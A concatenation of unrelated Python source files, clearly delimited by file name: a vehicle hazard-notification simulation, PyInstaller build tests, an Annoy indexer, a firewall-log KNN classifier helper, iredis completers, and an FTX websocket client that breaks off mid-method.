q_hazard = queue.Queue() #Queue used to send data from the movement thread to the hazard publisher thread
q_PoA = queue.LifoQueue() #Queue used to notify the thread_PoA_change
"""
SETTING THE SYSTEM
"""
my_car_info=ScenarioReader.car_info(App_ID)
my_poa_info=ScenarioReader.poa_info()
vehicle_speed=my_car_info.get_vehicle_speed()
vehicle_init_pos= my_car_info.get_car_initPosition()
max_Distance=my_poa_info.get_coverage_area()
number_APs= my_poa_info.get_number_APs()
myPoA_manager=PoAManager.PoA_Manager(max_Distance,number_APs ) #creates an object of the PoA_Manager class
my_hazard_generator=HazardManager.hazard_generator(max_Distance,vehicle_speed,vehicle_init_pos) #coverage_area,car_speed,car_init_position
print ('generating list by equidistant distance')
my_hazard_generator.generate_hazard_list(hazard_generator[0],hazard_generator[1])
my_hazard_detector=HazardManager.hazard_detector()
#print ("simulating scenario for vehicle:" , App_ID)
#print ("vehicle_speed: ",vehicle_speed )
#print ("vehicle_init_pos: ", vehicle_init_pos )
#print ("max_Distance: ", max_Distance )
#print ("number_APs: ",number_APs )
"""
REGISTERING THE VEHICLE AND SETTING THE SCENARIO
"""
print("poA limits: ", myPoA_manager.get_coord_coverage()) #show the coverage area of the PoA defined in the scenario file
print ("the PoA is: ", myPoA_manager.Determine_AP (vehicle_init_pos)) #shows the PoA where the vehicle is connected initially
myPoA_manager.change_PoA(App_ID, myPoA_manager.Determine_AP (vehicle_init_pos)) #call mobility event on AdvantEDGE
#to move the vehicle to the initial PoA before starting with the simulation
#--------------------------------------------------------------
#FUNCTIONS
#--------------------------------------------------------------
#Thread to control the movement of the vehicle
def thread_vehicle_movement(vehicle_ID, vehicle_init_pos, vehicle_speed):
global end_flag
global actual_position_car
global a1
c=0
a0=1#to check the when to change of PoA
a1=1#to check the when to change of PoA
m_Xms=movement.speed_m_mseg(vehicle_speed,simulation_speed) #Change the 2nd parameter to the number of ms
actual_position_car=vehicle_init_pos
while True:
start=time.time()
#determine if the simulation must be finished
if actual_position_car> max_Distance:
print ('---------simulation finished---------')
end_flag=0 #sets the flag to close the main file also
break
a1=myPoA_manager.Determine_AP (actual_position_car) #Determine current PoA
if a1!=a0: #Excecute just when the current AP is different to the previous
q_PoA.put(a1) #Call change of PoA thread
a0=a1 #Update value of the last registered AP
if my_hazard_detector.detect_hazard(actual_position_car,detection_range):
q_hazard.put(actual_position_car)#Call RESTCliet thread
actual_position_car=actual_position_car+m_Xms #moves the car with real speed each Xms
#TODO: make sure the complete loops is 10ms --> use waitUntil
time.sleep(0.01) #should be 10ms --> make sure it is always the same
end=time.time()
#print ("time: ", end-start)
#Thread to trigger the AP switching
def thread_PoA_change(vehicle_ID):
global end_flag
while True:
PoA=q_PoA.get()
myPoA_manager.change_PoA(vehicle_ID, PoA) #call mobility event ond AdvantEDGE
if end_flag==0:
break
time.sleep(0.01)
def thread_hazard_notifier(vehicle_ID):
global counter_hazard
global end_flag
global a1
sequence_number=-1#to put a number to the hazard to be posted
while True:
sequence_number+=1
actual_position_car = q_hazard.get() #get the position of the car when it detected the hazard
h_location=actual_position_car
h_type="TT" #just to test the type of hazard detected
id_hazard= vehicle_ID+ "-"+str(sequence_number) #to show the ID of the car that has detected the hazard
posting_time=time.time() #take the time before posting
print ("hazard: ", h_location, "number:", sequence_number )
#-->POST HAZARD TO SERVER
RESTclient.post_hazard (id_hazard,"00", h_type, h_location,a1) #also a1 to send poA
#end_posting_time=time.time()
#print("time: ", end_posting_time-posting_time)
logging.info("*{'V_ID':'%s','det_time':'%s','h_ID':'%s','type':'%s', 'location':%s}",vehicle_ID, posting_time,id_hazard, h_type, h_location)
if end_flag==0:
break
time.sleep(0.01)
#--------------------------------------------------------------
#MAIN
#--------------------------------------------------------------
if __name__ == "__main__":
#SET HERE THE START TIME OF THE SIMULATION --> 2 MINUTES AFTER THE ACTUAL TIME
a = datetime.now()
actual_time= datetime.now().minute
if actual_time==59:
d= datetime(datetime.now().year, datetime.now().month, datetime.now().day,datetime.now().hour+1 ,0)
else:
execution_time = actual_time+synch_delay
d= datetime(datetime.now().year, datetime.now().month, datetime.now().day,datetime.now().hour ,execution_time)
print("init time: ",d )
while True: #stays in the loop until the program must start
a = datetime.now()
if d<=a :
print (a,"---------POSTER------------", d )
break
time.sleep(0.001)
#STARTING ALL THREADS
x0_vehicle_movement = threading.Thread(target=thread_vehicle_movement, args=(App_ID,vehicle_init_pos,vehicle_speed))
x0_vehicle_movement.daemon = True
x0_vehicle_movement.start()
x0_hazard_notifier = threading.Thread(target=thread_hazard_notifier, args=(App_ID,))
x0_hazard_notifier.daemon = True
x0_hazard_notifier.start()
x0_PoA_change = threading.Thread(target=thread_PoA_change, args=(App_ID,))
x0_PoA_change.daemon = True
x0_PoA_change.start()
while True:
if end_flag==0:
break
time.sleep(0.2)
|
test_basic.py
|
# -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2005-2020, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
# Library imports
# ---------------
import locale
import os
import sys
# Third-party imports
# -------------------
import pytest
# Local imports
# -------------
from PyInstaller.compat import is_darwin, is_win, is_py37
from PyInstaller.utils.tests import importorskip, skipif, skipif_win, \
skipif_winorosx, skipif_notwin, skipif_notosx, skipif_no_compiler, \
skipif_notlinux, xfail
def test_run_from_path_environ(pyi_builder):
pyi_builder.test_script('pyi_absolute_python_path.py', run_from_path=True)
@skipif_winorosx
def test_absolute_ld_library_path(pyi_builder):
pyi_builder.test_script('pyi_absolute_ld_library_path.py')
def test_absolute_python_path(pyi_builder):
pyi_builder.test_script('pyi_absolute_python_path.py')
@skipif_notlinux
@skipif(not os.path.exists('/proc/self/status'),
reason='/proc/self/status does not exist')
@pytest.mark.parametrize("symlink_name",
["symlink",
"very_long_name_in_symlink",
"sub/dir/progam"])
def test_symlink_basename_is_kept(pyi_builder_spec, symlink_name,
tmpdir, SPEC_DIR, SCRIPT_DIR):
def patch(spec_name, symlink_name):
content = SPEC_DIR.join(spec_name).read_text(encoding="utf-8")
content = content.replace("@SYMLINKNAME@", symlink_name)
content = content.replace("@SCRIPTDIR@", str(SCRIPT_DIR))
outspec = tmpdir.join(spec_name)
outspec.write_text(content, encoding="utf-8", ensure=True)
return outspec
specfile = patch("symlink_basename_is_kept.spec", symlink_name)
pyi_builder_spec.test_spec(str(specfile), app_name=symlink_name)
def test_pyz_as_external_file(pyi_builder, monkeypatch):
# This tests the not well documented and seldom used feature of
# having the PYZ-archive in a separate file (.pkg).
def MyEXE(*args, **kwargs):
kwargs['append_pkg'] = False
return EXE(*args, **kwargs)
# :todo: find a better way to not even run this test in onefile-mode
if pyi_builder._mode == 'onefile':
pytest.skip('only --onedir')
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source("print('Hello Python!')")
def test_base_modules_regex(pyi_builder):
"""
Verify that the regex for excluding modules listed in
PY3_BASE_MODULES does not exclude other modules.
"""
pyi_builder.test_source(
"""
import resources_testmod
print('OK')
""")
def test_celementtree(pyi_builder):
pyi_builder.test_source(
"""
from xml.etree.cElementTree import ElementTree
print('OK')
""")
# Test a build with some complexity with the ``noarchive`` debug option.
def test_noarchive(pyi_builder):
pyi_builder.test_source("from xml.etree.cElementTree import ElementTree",
pyi_args=['--debug=noarchive'])
@importorskip('codecs')
def test_codecs(pyi_builder):
pyi_builder.test_script('pyi_codecs.py')
def test_compiled_filenames(pyi_builder):
pyi_builder.test_source("""
import pyi_dummy_module
from os.path import isabs
assert not isabs(pyi_dummy_module.dummy.__code__.co_filename), "pyi_dummy_module.dummy.__code__.co_filename has compiled filename: %s" % (pyi_dummy_module.dummy.__code__.co_filename,)
assert not isabs(pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename), "pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename has compiled filename: %s" % (pyi_dummy_module.DummyClass.dummyMethod.__code__.co_filename,)
""")
def test_decoders_ascii(pyi_builder):
pyi_builder.test_source(
"""
# Convert type 'bytes' to type 'str'.
assert b'foo'.decode('ascii') == 'foo'
""")
def test_distutils_submod(pyi_builder):
# Test import of submodules of distutils package
# PyI fails to include `distutils.version` when running from virtualenv
pyi_builder.test_source(
"""
from distutils.version import LooseVersion
""")
def test_dynamic_module(pyi_builder):
pyi_builder.test_source(
"""
import pyi_testmod_dynamic
# The value 'foo' should not be None.
print("'foo' value: %s" % pyi_testmod_dynamic.foo)
assert pyi_testmod_dynamic.foo is not None
assert pyi_testmod_dynamic.foo == 'A new value!'
""")
def test_email(pyi_builder):
pyi_builder.test_source(
"""
from email import utils
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.nonmultipart import MIMENonMultipart
""")
@importorskip('tinyaes')
def test_feature_crypto(pyi_builder):
pyi_builder.test_source(
"""
from pyimod00_crypto_key import key
from pyimod02_archive import CRYPT_BLOCK_SIZE
# Test against issue #1663: importing a package in the bootstrap
# phase should not interfere with subsequent imports.
import tinyaes
assert type(key) is str
# The test runner uses 'test_key' as key.
assert key == 'test_key'.zfill(CRYPT_BLOCK_SIZE)
""",
pyi_args=['--key=test_key'])
def test_feature_nocrypto(pyi_builder):
pyi_builder.test_source(
"""
try:
import pyimod00_crypto_key
raise AssertionError('The pyimod00_crypto_key module must NOT be there if crypto is disabled.')
except ImportError:
pass
""")
def test_filename(pyi_builder):
pyi_builder.test_script('pyi_filename.py')
def test_getfilesystemencoding(pyi_builder):
pyi_builder.test_script('pyi_getfilesystemencoding.py')
def test_helloworld(pyi_builder):
pyi_builder.test_source("print('Hello Python!')")
def test_module__file__attribute(pyi_builder):
pyi_builder.test_script('pyi_module__file__attribute.py')
def test_module_attributes(tmpdir, pyi_builder):
# Create file in tmpdir with path to python executable and if it is running
# in debug mode.
# Test script uses python interpreter to compare module attributes.
with open(os.path.join(tmpdir.strpath, 'python_exe.build'), 'w') as f:
f.write(sys.executable + "\n")
f.write('debug=%s' % __debug__ + '\n')
# On Windows we need to preserve systme PATH for subprocesses in tests.
f.write(os.environ.get('PATH') + '\n')
pyi_builder.test_script('pyi_module_attributes.py')
@xfail(is_darwin, reason='Issue #1895.')
def test_module_reload(pyi_builder):
pyi_builder.test_script('pyi_module_reload.py')
# TODO test it on OS X.
@skipif_no_compiler
def test_load_dll_using_ctypes(monkeypatch, pyi_builder, compiled_dylib):
# Note that including the data_dir fixture copies files needed by this test.
#
# TODO Make sure PyInstaller is able to find the library and bundle it with the app.
# # If the required dylib does not reside in the current directory, the Analysis
# # class machinery, based on ctypes.util.find_library, will not find it. This
# # was done on purpose for this test, to show how to give Analysis class
# # a clue.
# if is_win:
# os.environ['PATH'] = os.path.abspath(CTYPES_DIR) + ';' + os.environ['PATH']
# else:
# os.environ['LD_LIBRARY_PATH'] = CTYPES_DIR
# os.environ['DYLD_LIBRARY_PATH'] = CTYPES_DIR
# os.environ['LIBPATH'] = CTYPES_DIR
# Build and run the app.
pyi_builder.test_script('pyi_load_dll_using_ctypes.py')
def test_get_meipass_value(pyi_builder):
pyi_builder.test_script('pyi_get_meipass_value.py')
def test_chdir_meipass(pyi_builder):
# Ensure meipass dir exists.
pyi_builder.test_source(
"""
import os, sys
os.chdir(sys._MEIPASS)
print(os.getcwd())
""")
def test_option_exclude_module(pyi_builder):
"""
Test to ensure that when using option --exclude-module=xml.sax
the module 'xml.sax' won't be bundled.
"""
pyi_builder.test_source(
"""
try:
import xml.sax
# Option --exclude-module=xml.sax did not work and the module
# was successfully imported.
raise SystemExit('Module xml.sax was excluded but it is '
'bundled with the executable.')
except ImportError:
# The Import error is expected since PyInstaller should
# not bundle 'xml.sax' module.
pass
""",
pyi_args=['--exclude-module', 'xml.sax'])
def test_option_verbose(pyi_builder, monkeypatch):
"Test to ensure that option V can be set and has effect."
# This option is like 'python -v' - trace import statements.
# 'None' should be allowed or '' also.
def MyEXE(*args, **kwargs):
args = list(args)
args.append([('v', None, 'OPTION')])
return EXE(*args, **kwargs)
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source(
"""
print('test - PYTHONVERBOSE - trace import statements')
import re # just import anything
print('test - done')
""")
def test_option_w_unset(pyi_builder):
"Test to ensure that option W is not set by default."
pyi_builder.test_source(
"""
import sys
assert 'ignore' not in sys.warnoptions
""")
def test_option_w_ignore(pyi_builder, monkeypatch, capsys):
"Test to ensure that option W can be set."
def MyEXE(*args, **kwargs):
args = list(args)
args.append([('W ignore', '', 'OPTION')])
return EXE(*args, **kwargs)
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
pyi_builder.test_source(
"""
import sys
assert 'ignore' in sys.warnoptions
""")
_, err = capsys.readouterr()
assert "'import warnings' failed" not in err
@skipif_win
def test_python_makefile(pyi_builder):
pyi_builder.test_script('pyi_python_makefile.py')
def test_set_icon(pyi_builder, data_dir):
if is_win:
args = ['--icon', os.path.join(data_dir.strpath, 'pyi_icon.ico')]
elif is_darwin:
# On OS X icon is applied only for windowed mode.
args = ['--windowed', '--icon', os.path.join(data_dir.strpath, 'pyi_icon.icns')]
else:
pytest.skip('option --icon works only on Windows and Mac OS X')
pyi_builder.test_source("print('Hello Python!')", pyi_args=args)
def test_python_home(pyi_builder):
pyi_builder.test_script('pyi_python_home.py')
def test_stderr_encoding(tmpdir, pyi_builder):
# NOTE: '-s' option to pytest disables output capturing, changing this test's result:
# without -s: py.test process changes its own stdout encoding to 'UTF-8' to
# capture output. subprocess spawned by py.test has stdout encoding
# 'cp1252', which is an ANSI codepage. test fails as they do not match.
# with -s: py.test process has stdout encoding from windows terminal, which is an
# OEM codepage. spawned subprocess has the same encoding. test passes.
#
with open(os.path.join(tmpdir.strpath, 'stderr_encoding.build'), 'w') as f:
if sys.stderr.isatty():
enc = str(sys.stderr.encoding)
else:
# For non-interactive stderr use locale encoding - ANSI codepage.
# This fixes the test when running with py.test and capturing output.
enc = locale.getpreferredencoding(False)
f.write(enc)
pyi_builder.test_script('pyi_stderr_encoding.py')
def test_stdout_encoding(tmpdir, pyi_builder):
with open(os.path.join(tmpdir.strpath, 'stdout_encoding.build'), 'w') as f:
if sys.stdout.isatty():
enc = str(sys.stdout.encoding)
else:
# For non-interactive stderr use locale encoding - ANSI codepage.
# This fixes the test when running with py.test and capturing output.
enc = locale.getpreferredencoding(False)
f.write(enc)
pyi_builder.test_script('pyi_stdout_encoding.py')
def test_site_module_disabled(pyi_builder):
pyi_builder.test_script('pyi_site_module_disabled.py')
def test_time_module(pyi_builder):
pyi_builder.test_source(
"""
import time
print(time.strptime(time.ctime()))
""")
@skipif_win
def test_time_module_localized(pyi_builder, monkeypatch):
# This checks that functions 'time.ctime()' and 'time.strptime()'
# use the same locale. There was an issue with bootloader where
# every function was using different locale:
# time.ctime was using 'C'
# time.strptime was using 'xx_YY' from the environment.
lang = 'cs_CZ' if is_darwin else 'cs_CZ.UTF-8'
monkeypatch.setenv('LC_ALL', lang)
pyi_builder.test_source(
"""
import time
print(time.strptime(time.ctime()))
""")
def test_xmldom_module(pyi_builder):
pyi_builder.test_source(
"""
print('Importing xml.dom')
from xml.dom import pulldom
print('Importing done')
""")
def test_threading_module(pyi_builder):
pyi_builder.test_source(
"""
import threading
import sys
print('See stderr for messages')
def print_(*args): print(*args, file=sys.stderr)
def doit(nm):
print_(nm, 'started')
import pyi_testmod_threading
try:
print_(nm, pyi_testmod_threading.x)
finally:
print_(nm, pyi_testmod_threading)
t1 = threading.Thread(target=doit, args=('t1',))
t2 = threading.Thread(target=doit, args=('t2',))
t1.start()
t2.start()
doit('main')
t1.join() ; print_('t1 joined')
t2.join() ; print_('t2 joined')
print_('finished.')
""")
def test_threading_module2(pyi_builder):
pyi_builder.test_script('pyi_threading_module2.py')
def test_argument(pyi_builder):
pyi_builder.test_source(
'''
import sys
assert sys.argv[1] == "--argument", "sys.argv[1] was %s, expected %r" % (sys.argv[1], "--argument")
''',
app_args=["--argument"])
@importorskip('win32com')
def test_pywin32_win32com(pyi_builder):
pyi_builder.test_source(
"""
# Test importing some modules from pywin32 package.
# All modules from pywin32 depens on module pywintypes.
# This module should be also included.
import win32com
import win32com.client
import win32com.server
""")
#@pytest.mark.xfail(reason="Requires post-create-package hooks (issue #1322)")
@importorskip('win32com')
def test_pywin32_comext(pyi_builder):
pyi_builder.test_source(
"""
# Test importing modules from win32com that are actually present in
# win32comext, and made available by __path__ changes in win32com.
from win32com.shell import shell
from win32com.propsys import propsys
from win32com.bits import bits
""")
@importorskip('win32ui')
def test_pywin32_win32ui(pyi_builder):
pyi_builder.test_source(
"""
# Test importing some modules from pywin32 package.
# All modules from pywin32 depens on module pywintypes.
# This module should be also included.
import win32ui
from pywin.mfc.dialog import Dialog
d = Dialog(win32ui.IDD_SIMPLE_INPUT)
""")
@skipif_notwin
def test_renamed_exe(pyi_builder):
_old_find_executables = pyi_builder._find_executables
def _find_executables(name):
oldexes = _old_find_executables(name)
newexes = []
for old in oldexes:
new = os.path.join(os.path.dirname(old), "renamed_" + os.path.basename(old))
os.rename(old, new)
newexes.append(new)
return newexes
pyi_builder._find_executables = _find_executables
pyi_builder.test_source("print('Hello Python!')")
def test_spec_with_utf8(pyi_builder_spec):
pyi_builder_spec.test_spec('spec-with-utf8.spec')
@skipif_notosx
def test_osx_override_info_plist(pyi_builder_spec):
pyi_builder_spec.test_spec('pyi_osx_override_info_plist.spec')
def test_hook_collect_submodules(pyi_builder, script_dir):
# This is designed to test the operation of
# PyInstaller.utils.hook.collect_submodules. To do so:
#
# 1. It imports the dummy module pyi_collect_submodules_mod, which
# contains nothing.
# 2. This causes hook-pyi_collect_submodules_mod.py to be run,
# which collects some dummy submodules. In this case, it
# collects from modules/pyi_testmod_relimp.
# 3. Therefore, we should be able to find hidden imports under
# pyi_testmod_relimp.
pyi_builder.test_source(
"""
import pyi_collect_submodules_mod
__import__('pyi_testmod_relimp.B.C')
""",
['--additional-hooks-dir=%s' % script_dir.join('pyi_hooks')])
# Test that PyInstaller can handle a script with an arbitrary extension.
def test_arbitrary_ext(pyi_builder):
pyi_builder.test_script('pyi_arbitrary_ext.foo')
def test_option_runtime_tmpdir(pyi_builder):
"Test to ensure that option `runtime_tmpdir` can be set and has effect."
pyi_builder.test_source(
"""
print('test - runtime_tmpdir - custom runtime temporary directory')
import os
import sys
if sys.platform == 'win32':
import win32api
cwd = os.path.abspath(os.getcwd())
runtime_tmpdir = os.path.abspath(sys._MEIPASS)
# for onedir mode, runtime_tmpdir == cwd
# for onefile mode, os.path.dirname(runtime_tmpdir) == cwd
if not runtime_tmpdir == cwd and not os.path.dirname(runtime_tmpdir) == cwd:
raise SystemExit('Expected sys._MEIPASS to be under current working dir.'
' sys._MEIPASS = ' + runtime_tmpdir + ', cwd = ' + cwd)
print('test - done')
""",
['--runtime-tmpdir=.']) # set runtime-tmpdir to current working dir
@xfail(reason='Issue #3037 - all scripts share the same global vars')
def test_several_scripts1(pyi_builder_spec):
"""Verify each script has it's own global vars (original case, see issue
#2949).
"""
pyi_builder_spec.test_spec('several-scripts1.spec')
@xfail(reason='Issue #3037 - all scripts share the same global vars')
def test_several_scripts2(pyi_builder_spec):
"""
Verify each script has it's own global vars (basic test).
"""
pyi_builder_spec.test_spec('several-scripts2.spec')
|
indexer.py
|
# coding: utf-8
from __future__ import print_function
from __future__ import unicode_literals
import annoy
import time
import tqdm
import random
import multiprocessing
def graceful_exit(fn):
def _impl(*args, **kwargs):
try:
return fn(*args, **kwargs)
except KeyboardInterrupt:
return None
return _impl
class Indexer(object):
def __init__(self,
index_path,
update_interval=10,
index_trees=20,
vector_length=384):
self.index_path = index_path
self.update_interval = update_interval
self.index_trees = index_trees
self.vector_length = vector_length
self.mapping = {}
def initial_load(self):
raise NotImplementedError
def update(self):
# Return Falsey if no updates were detected
raise NotImplementedError
def save_annoy_file(self):
index = annoy.AnnoyIndex(self.vector_length)
for i, v in tqdm.tqdm(self.mapping.items()):
try:
index.add_item(i, v)
except IndexError as e:
continue
t = time.time()
index.build(self.index_trees)
index.save(self.index_path)
index.unload()
def _run_init(self):
self.initial_load()
self.save_annoy_file()
def _run_step(self):
changed = self.update()
if changed:
self.save_annoy_file()
@graceful_exit
def run(self):
self._run_init()
while True:
self._run_step()
time.sleep(self.update_interval)
def background(self):
p = multiprocessing.Process(target=self.run, args=tuple())
p.daemon = False
p.start()
return p
|
helpers.py
|
import threading
from app.models import *
from app.preprocessin import *
from app.knn_new import knn_predict
import time
class LogFetcher(threading.Thread):
def run(self):
while True:
latest_pred_id = data_set_normalized.objects.all()
last_pred_id= len(latest_pred_id)
if latest_pred_id == None:
last_pred_id = 0
t= threading.Thread(target = self.preprocess_log, args=(last_pred_id,))
# target function is preporcess_log
t.start()
time.sleep(3600)
#sleep for 1 hour
def preprocess_log(self,last_pred_id):
latest_id = data_set.objects.all()
last_id= len(latest_id)
if latest_id == None:
last_id = 0
#address where powershell script copies the logs in txt file
file_add = "C:/Users/Dell/Documents/GitHub/Major-Project/FrontEnd/FrontEnd/app/firewalllog.txt"
#preprocess txt file and save normailzed data in data_set_normalized model
convert_to_csv(file_add, last_id)
#get the values from database and use prediction
cnx = sqlite3.connect("./db.sqlite3")
df = pd.read_sql("SELECT * FROM app_data_set_normalized WHERE id > (?)",params=(last_pred_id,), con=cnx)
if len(df)==0:
print("no new entries")
else:
X = np.array(df.drop(["id","data_set_id"],1))
y = np.array(len(X))
#predict the values
y_pred = knn_predict(X)
#save predicted values into a new database
print(y_pred)
df_pred = pd.DataFrame(y_pred)
df_pred["data_set_id"]=df["data_set_id"]
df_pred.columns=["category", "data_set_id"]
#delete the previous database
#add new prediction into the database
df_pred.to_sql(name="app_classified_data",if_exists = "append", con =cnx, index=False)
print("predicted")
|
completers.py
|
import time
import threading
import logging
from typing import Iterable
from prompt_toolkit.contrib.regular_languages.completion import GrammarCompleter
from prompt_toolkit.contrib.regular_languages.compiler import compile
from prompt_toolkit.completion import WordCompleter, FuzzyWordCompleter
from prompt_toolkit.document import Document
from prompt_toolkit.completion import Completion, CompleteEvent
from .config import config, COMPILING_DONE, COMPILING_JUST_FINISH
from .redis_grammar import REDIS_COMMANDS, CONST
from .lexer import get_lexer
from .commands_csv_loader import group2commands, commands_summary, all_commands
logger = logging.getLogger(__name__)
class LatestUsedFirstWordCompleter(FuzzyWordCompleter):
"""
Not thread safe.
"""
def __init__(self, max_words, words, *args, **kwargs):
self.words = words
self.max_words = max_words
super().__init__(words, *args, **kwargs)
def touch(self, word):
"""
Make sure word is in the first place of the completer
list.
"""
if word in self.words:
self.words.remove(word)
else: # not in words
if len(self.words) == self.max_words: # full
self.words.pop()
self.words.insert(0, word)
def touch_words(self, words):
for word in words:
self.touch(word)
class FakeDocument:
pass
class RedisGrammarCompleter(GrammarCompleter):
"""
This disable Completer on blank characters, blank char will cause
performance issues.
"""
def get_completions(
self, document: Document, complete_event: CompleteEvent
) -> Iterable[Completion]:
origin_text = document.text_before_cursor
stripped = FakeDocument()
stripped.text_before_cursor = origin_text.lstrip()
# Do not complete on spaces, too slow
if not origin_text.strip():
return []
return super().get_completions(stripped, complete_event)
def get_completer(group2commands, redis_grammar):
completer_mapping = {}
# patch command completer with hint
command_hint = {key: info["summary"] for key, info in commands_summary.items()}
for command_group, commands in group2commands.items():
words = commands + [command.lower() for command in commands]
if config.newbie_mode:
hint = {command: command_hint.get(command.upper()) for command in words}
else:
hint = None
completer_mapping[command_group] = WordCompleter(
words, sentence=True, meta_dict=hint
)
key_completer = LatestUsedFirstWordCompleter(config.completer_max, [])
member_completer = LatestUsedFirstWordCompleter(config.completer_max, [])
field_completer = LatestUsedFirstWordCompleter(config.completer_max, [])
completer_mapping.update(
{
key: WordCompleter(tokens.split(" "), ignore_case=True)
for key, tokens in CONST.items()
}
)
completer_mapping.update(
{
# all key related completers share the same completer
"keys": key_completer,
"key": key_completer,
"destination": key_completer,
"newkey": key_completer,
# member
"member": member_completer,
"members": member_completer,
# hash fields
"field": field_completer,
"fields": field_completer,
}
)
completer_mapping["commandname"] = WordCompleter(all_commands, ignore_case=True)
completer = RedisGrammarCompleter(redis_grammar, completer_mapping)
return completer
def compile_grammar_bg(session):
"""
compile redis grammar in a thread, and patch session's lexer
and completer.
"""
def compile_and_patch(session):
start_time = time.time()
logger.debug("[compile] start compile grammer...")
redis_grammar = compile(REDIS_COMMANDS)
end_time = time.time()
logger.debug(f"[compile] Compile finished! Cost: {end_time - start_time}")
# get lexer
lexer = get_lexer(group2commands.keys(), redis_grammar)
# get completer
completer = get_completer(group2commands, redis_grammar)
session.completer = completer
session.lexer = lexer
logger.debug("[compile] Patch finished!")
config.compiling = COMPILING_JUST_FINISH
time.sleep(1)
config.compiling = COMPILING_DONE
# set daemon=True, when main thread exit, this compiling thread should
# exit as well.
compiling_thread = threading.Thread(
target=compile_and_patch, args=(session,), daemon=True
)
compiling_thread.start()
|
ftxclient.py
|
import hmac
import json
import time
import zlib
from collections import defaultdict, deque
from gevent.event import Event
from itertools import zip_longest
from threading import Thread, Lock
from typing import Callable, DefaultDict, Deque, List, Dict, Tuple, Optional
from websocket import WebSocketApp
# based on https://github.com/ftexchange/ftx/tree/master/websocket
class WebsocketManager:
_CONNECT_TIMEOUT_S = 5
def __init__(self):
self.connect_lock = Lock()
self.ws = None
def _get_url(self):
raise NotImplementedError()
def _on_message(self, ws, message):
raise NotImplementedError()
def send(self, message):
self.connect()
self.ws.send(message)
def send_json(self, message):
self.send(json.dumps(message))
def _connect(self):
assert not self.ws, "ws should be closed before attempting to connect"
self.ws = WebSocketApp(
self._get_url(),
on_message=self._wrap_callback(self._on_message),
on_close=self._wrap_callback(self._on_close),
on_error=self._wrap_callback(self._on_error),
)
wst = Thread(target=self._run_websocket, args=(self.ws, ))
wst.daemon = True
wst.start()
# Wait for socket to connect
ts = time.time()
while self.ws and (not self.ws.sock or not self.ws.sock.connected):
if time.time() - ts > self._CONNECT_TIMEOUT_S:
self.ws = None
return
time.sleep(0.1)
def _wrap_callback(self, f):
def wrapped_f(ws, *args, **kwargs):
if ws is self.ws:
try:
f(ws, *args, **kwargs)
except Exception as e:
raise Exception(f'Error running websocket callback: {e}')
return wrapped_f
def _run_websocket(self, ws):
try:
ws.run_forever()
except Exception as e:
raise Exception(f'Unexpected error while running websocket: {e}')
finally:
self._reconnect(ws)
def _reconnect(self, ws):
assert ws is not None, '_reconnect should only be called with an existing ws'
if ws is self.ws:
self.ws = None
ws.close()
self.connect()
def connect(self):
if self.ws:
return
with self.connect_lock:
while not self.ws:
self._connect()
if self.ws:
return
def _on_close(self, ws):
self._reconnect(ws)
def _on_error(self, ws, error):
self._reconnect(ws)
def reconnect(self) -> None:
if self.ws is not None:
self._reconnect(self.ws)
class FtxWebsocketClient(WebsocketManager):
_ENDPOINT = 'wss://ftx.com/ws/'
def __init__(self, api_key=None, api_secret=None) -> None:
super().__init__()
self._trades: DefaultDict[str, Deque] = defaultdict(
lambda: deque([], maxlen=10000))
self._fills: Deque = deque([], maxlen=10000)
self._api_key = api_key
self._api_secret = api_secret
self._orderbook_update_events: DefaultDict[str,
Event] = defaultdict(Event)
self._reset_data()
def _on_open(self, ws):
self._reset_data()
def _reset_data(self) -> None:
self._subscriptions: List[Dict] = []
self._ticker_cbs: Dict[str, Callable[[str, Dict], None]] = {}
self._orders: DefaultDict[int, Dict] = defaultdict(dict)
self._tickers: DefaultDict[str, Dict] = defaultdict(dict)
self._orderbook_timestamps: DefaultDict[str,
float] = defaultdict(float)
self._orderbook_update_events.clear()
self._orderbooks: DefaultDict[str, Dict[str, DefaultDict[
float, float]]] = defaultdict(
lambda:
{side: defaultdict(float)
for side in {'bids', 'asks'}})
self._orderbook_timestamps.clear()
self._logged_in = False
self._last_received_orderbook_data_at: float = 0.0
def _reset_orderbook(self, market: str) -> None:
if market in self._orderbooks:
del self._orderbooks[market]
if market in self._orderbook_timestamps:
del self._orderbook_timestamps[market]
def _get_url(self) -> str:
return self._ENDPOINT
def _login(self) -> None:
ts = int(time.time() * 1000)
self.send_json({
'op': 'login',
'args': {
'key':
self._api_key,
'sign':
hmac.new(self._api_secret.encode(),
f'{ts}websocket_login'.encode(),
'sha256').hexdigest(),
'time':
ts,
}
})
self._logged_in = True
def subscribe_ticker(self,
ticker: str,
cb: Callable[[str, Dict], None] = None) -> None:
if ticker in self._ticker_cbs:
return
self._ticker_cbs[ticker] = cb
self._subscribe({'channel': 'ticker', 'market': ticker})
def _subscribe(self, subscription: Dict) -> None:
self.send_json({'op': 'subscribe', **subscription})
self._subscriptions.append(subscription)
def _unsubscribe(self, subscription: Dict) -> None:
self.send_json({'op': 'unsubscribe', **subscription})
while subscription in self._subscriptions:
self._subscriptions.remove(subscription)
def get_fills(self) -> List[Dict]:
if not self._logged_in:
self._login()
subscription = {'channel': 'fills'}
if subscription not in self._subscriptions:
self._subscribe(subscription)
return list(self._fills.copy())
def get_orders(self) -> Dict[int, Dict]:
if not self._logged_in:
self._login()
subscription = {'channel': 'orders'}
if subscription not in self._subscriptions:
self._subscribe(subscription)
return dict(self._orders.copy())
def get_trades(self, market: str) -> List[Dict]:
subscription = {'channel': 'trades', 'market': market}
if subscription not in self._subscriptions:
self._subscribe(subscription)
return list(self._trades[market].copy())
def get_orderbook(self,
market: str) -> Dict[str, List[Tuple[float, float]]]:
subscription = {'channel': 'orderbook', 'market': market}
